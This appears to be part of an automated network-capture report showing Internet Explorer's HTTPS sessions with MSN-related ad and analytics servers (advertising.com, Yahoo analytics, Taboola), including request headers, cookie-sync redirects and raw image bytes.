Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 63 73 2e 6d 65 64 69 61 2e 6e 65 74 2f 63 6b 73 79 6e 63 3f 74 79 70 65 3d 67 26 61 6d 70 3b 63 73 3d 31 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 67 69 64 3d 43 41 45 53 45 4e 6c 79 70 58 53 51 61 72 7a 79 50 66 5a 61 64 4a 72 65 67 74 55 26
Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://cs.media.net/cksync?type=g&amp;cs=1&amp;google_gid=CAESENlypXSQarzyPfZadJregtU&


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                  14192.168.2.44983618.197.99.6443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:53 UTC29OUTGET /ups/58222/sync?_origin=1&uid=2766163126684138000V10 HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Host: pixel.advertising.com
2021-10-07 13:51:53 UTC | 29 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:53 GMT
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  Set-Cookie: APID=UPbaae6187-2775-11ec-83da-02a5fb3287ae;Version=1;Domain=.advertising.com;Path=/;Max-Age=31622400;Expires=Sat, 08-Oct-2022 13:51:53 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                  P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
                                                                                                                                                                                                                                                                                  Location: https://pixel.advertising.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.4 | 49835 | 18.197.99.6 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:53 UTC | 30 | OUT | GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Host: pixel.advertising.com
                                                                                                                                                                                                                                                                                  Cookie: APID=UPbaae6187-2775-11ec-83da-02a5fb3287ae
2021-10-07 13:51:53 UTC | 31 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:53 GMT
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  Set-Cookie: APID=UPbaae6187-2775-11ec-83da-02a5fb3287ae;Version=1;Domain=.advertising.com;Path=/;Max-Age=31622400;Expires=Sat, 08-Oct-2022 13:51:53 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                  P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
                                                                                                                                                                                                                                                                                  Location: https://ups.analytics.yahoo.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.4 | 49838 | 18.156.0.31 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:53 UTC | 31 | OUT | GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10 HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Host: ups.analytics.yahoo.com
2021-10-07 13:51:53 UTC | 32 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:53 GMT
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
                                                                                                                                                                                                                                                                                  Location: https://ups.analytics.yahoo.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true
                                                                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Server: ATS/7.1.2.138
                                                                                                                                                                                                                                                                                  Set-Cookie: A3=d=AQABBHn7XmECED9EQKD1rm_VP_Ee6eSFlJQFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAArHDJIVI0s-06yY7YAPRXTU; Expires=Fri, 7 Oct 2022 19:51:53 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                                                  Set-Cookie: B=99545shglturp&b=3&s=qu; Expires=Fri, 7 Oct 2022 19:51:53 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.4 | 49837 | 18.156.0.31 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:53 UTC | 32 | OUT | GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Host: ups.analytics.yahoo.com
2021-10-07 13:51:53 UTC | 33 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:53 GMT
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
                                                                                                                                                                                                                                                                                  Location: https://ups.analytics.yahoo.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae&verify=true
                                                                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Server: ATS/7.1.2.138
                                                                                                                                                                                                                                                                                  Set-Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAAi1F1ZX9HUZ5b_X1VfLc_ec; Expires=Fri, 7 Oct 2022 19:51:53 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                                                  Set-Cookie: B=e7a21vhglturp&b=3&s=jp; Expires=Fri, 7 Oct 2022 19:51:53 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.4 | 49841 | 18.156.0.31 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:54 UTC | 34 | OUT | GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Host: ups.analytics.yahoo.com
                                                                                                                                                                                                                                                                                  Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAAi1F1ZX9HUZ5b_X1VfLc_ec; B=99545shglturp&b=3&s=qu
2021-10-07 13:51:54 UTC | 36 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:54 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  Set-Cookie: IDSYNC=18xa~20tp;Version=1;Domain=.analytics.yahoo.com;Path=/;Max-Age=31622400;Expires=Sat, 08-Oct-2022 13:51:54 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                  P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
                                                                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Server: ATS/7.1.2.138
                                                                                                                                                                                                                                                                                  Set-Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAAcIefteYeSFlJQ&S=AQAAAm9L7ZT7zwPRWLLWtDtkyjM; Expires=Fri, 7 Oct 2022 19:51:54 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                                                  Set-Cookie: B=99545shglturp&b=3&s=qu; Expires=Fri, 7 Oct 2022 19:51:54 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.4 | 49842 | 18.156.0.31 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:54 UTC | 34 | OUT | GET /ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae&verify=true HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Host: ups.analytics.yahoo.com
                                                                                                                                                                                                                                                                                  Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAA&S=AQAAAi1F1ZX9HUZ5b_X1VfLc_ec; B=e7a21vhglturp&b=3&s=jp
2021-10-07 13:51:54 UTC | 35 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:54 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  Set-Cookie: IDSYNC=18xa~20tp;Version=1;Domain=.analytics.yahoo.com;Path=/;Max-Age=31622400;Expires=Sat, 08-Oct-2022 13:51:54 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: APID=UPbaae6187-2775-11ec-83da-02a5fb3287ae;Version=1;Domain=.yahoo.com;Path=/;Max-Age=7380485;Expires=Sat, 01-Jan-2022 00:00:00 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: APIDTS=1633614714;Version=1;Domain=.yahoo.com;Path=/;Max-Age=86400;Expires=Fri, 08-Oct-2021 13:51:54 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                  P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
                                                                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Server: ATS/7.1.2.138
                                                                                                                                                                                                                                                                                  Set-Cookie: A3=d=AQABBHn7XmECELkmLZa1IAljTGaHi_xBqOMFEgEBAQFMYGFoYQAAAAAA_eMAAAcIefteYfxBqOM&S=AQAAAqUUw86y1PdZ3on3l4PzIe8; Expires=Fri, 7 Oct 2022 19:51:54 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                                                  Set-Cookie: B=e7a21vhglturp&b=3&s=jp; Expires=Fri, 7 Oct 2022 19:51:54 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49806 | 172.67.69.19 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:51 UTC | 11 | OUT | GET /px.gif?ch=1&e=0.8749585328117704 HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Host: ad-delivery.net
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
2021-10-07 13:51:51 UTC | 14 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:51 GMT
                                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  X-GUploader-UploadID: ABg5-UzSZ-Kt1WbGdd88HlCnZf7YcJGLu-DR5tPwPS9bXoxAsvJYwt4jGn6LAHoZbG34sctt0vecv7iFCJZExLBCcbRvF7nEjw
                                                                                                                                                                                                                                                                                  Expires: Thu, 07 Oct 2021 13:34:36 GMT
                                                                                                                                                                                                                                                                                  Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                                                                                                                                                                                                                                  ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                                                                                                                                                                                                                                  x-goog-generation: 1620242732037093
                                                                                                                                                                                                                                                                                  x-goog-metageneration: 5
                                                                                                                                                                                                                                                                                  x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                                                                                  x-goog-stored-content-length: 43
                                                                                                                                                                                                                                                                                  x-goog-hash: crc32c=cpEfJQ==
                                                                                                                                                                                                                                                                                  x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                                                                                                                                                                                                                                  x-goog-storage-class: MULTI_REGIONAL
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                                                                                                                                                                                                                                  Age: 1970
                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zJqUwV3i9RyjMJLDirrz6hbaZKYKutqjTjZ7b1bqp42FLOB5%2BknfLIl4xD1mAfy9CwE25LULjZzYJfl59RwI2DKX1LWVkw9DMDiSbqEc0vAM8feMR2PQ%2F11BLWn7vvLMAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 69a79b4dbbe568f7-FRA
2021-10-07 13:51:51 UTC | 15 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c
Data Ascii: GIF89a!,
2021-10-07 13:51:51 UTC | 15 | IN | Data Raw: 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
Data Ascii: L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.4 | 49847 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:55 UTC | 37 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F46fb1684-fb46-4b92-97d6-73c06aebbfee_1000x600_bdf0634e74df9e1a3c17cd78afe8adb9.png HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Host: img.img-taboola.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
2021-10-07 13:51:55 UTC | 38 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Content-Length: 17316
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                                                  edge-cache-tag: 320725624966224040689221604209161944030,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                                                                                                                                                                                                                                                  etag: "70e7a9513624839b604443b3b54043d6"
                                                                                                                                                                                                                                                                                  last-modified: Sat, 21 Aug 2021 20:30:14 GMT
                                                                                                                                                                                                                                                                                  status: 200 OK
                                                                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                                                                  x-ratelimit-limit: 101
                                                                                                                                                                                                                                                                                  x-ratelimit-remaining: 99
                                                                                                                                                                                                                                                                                  x-ratelimit-reset: 1
                                                                                                                                                                                                                                                                                  x-request-id: 6f4228e5a35dd1d92b2ea2259ea618a2
                                                                                                                                                                                                                                                                                  x-envoy-upstream-service-time: 130
                                                                                                                                                                                                                                                                                  X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb203
                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:55 GMT
                                                                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                                                                  Age: 1489024
                                                                                                                                                                                                                                                                                  X-Served-By: cache-wdc5527-WDC, cache-mxp6937-MXP
                                                                                                                                                                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                  X-Cache-Hits: 1, 1
                                                                                                                                                                                                                                                                                  X-Timer: S1633614715.271185,VS0,VE1
                                                                                                                                                                                                                                                                                  Vary: ImageFormat
                                                                                                                                                                                                                                                                                  X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F46fb1684-fb46-4b92-97d6-73c06aebbfee_1000x600_bdf0634e74df9e1a3c17cd78afe8adb9.png
                                                                                                                                                                                                                                                                                  X-vcl-time-ms: 1


                                                                                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                                                                                                                  21 | 192.168.2.4 | 49848 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC | 37 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F679db3c1-e62f-47d5-bd90-53b48f4ed0c6_1000x600_9a0f5b727e2a50702107d4e4fbcb72f2.png HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Host: img.img-taboola.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC162INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Content-Length: 32418
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                                                  edge-cache-tag: 623575638407919105839610360858388108163,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                                                                                                                                                                                                                                                  etag: "d82bcf09d0447acaffb27abbcaccf36b"
                                                                                                                                                                                                                                                                                  last-modified: Thu, 16 Sep 2021 20:08:16 GMT
                                                                                                                                                                                                                                                                                  status: 200 OK
                                                                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                                                                  x-ratelimit-limit: 101
                                                                                                                                                                                                                                                                                  x-ratelimit-remaining: 98
                                                                                                                                                                                                                                                                                  x-ratelimit-reset: 1
                                                                                                                                                                                                                                                                                  x-request-id: 9a81f5ce20284f24938456f7f27a5940
                                                                                                                                                                                                                                                                                  x-envoy-upstream-service-time: 83
                                                                                                                                                                                                                                                                                  X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb202
                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:55 GMT
                                                                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                                                                  Age: 1734082
                                                                                                                                                                                                                                                                                  X-Served-By: cache-wdc5568-WDC, cache-mxp6930-MXP
                                                                                                                                                                                                                                                                                  X-Cache: HIT, MISS
                                                                                                                                                                                                                                                                                  X-Cache-Hits: 1, 0
                                                                                                                                                                                                                                                                                  X-Timer: S1633614715.284840,VS0,VE264
                                                                                                                                                                                                                                                                                  Vary: ImageFormat
                                                                                                                                                                                                                                                                                  X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F679db3c1-e62f-47d5-bd90-53b48f4ed0c6_1000x600_9a0f5b727e2a50702107d4e4fbcb72f2.png
                                                                                                                                                                                                                                                                                  X-vcl-time-ms: 264
                                                                                                                                                                                                                                                                                  Data Ascii: I-4Zd2{TK5wW3$02zJVC'rOqs[K$L~/2G#hMzCq?Ln2&Ezx"*t%f`uNkcn-e@4+Y%e(jkf/ZlsT:ijlZrH<EDeYHuR'p*cp0kfu
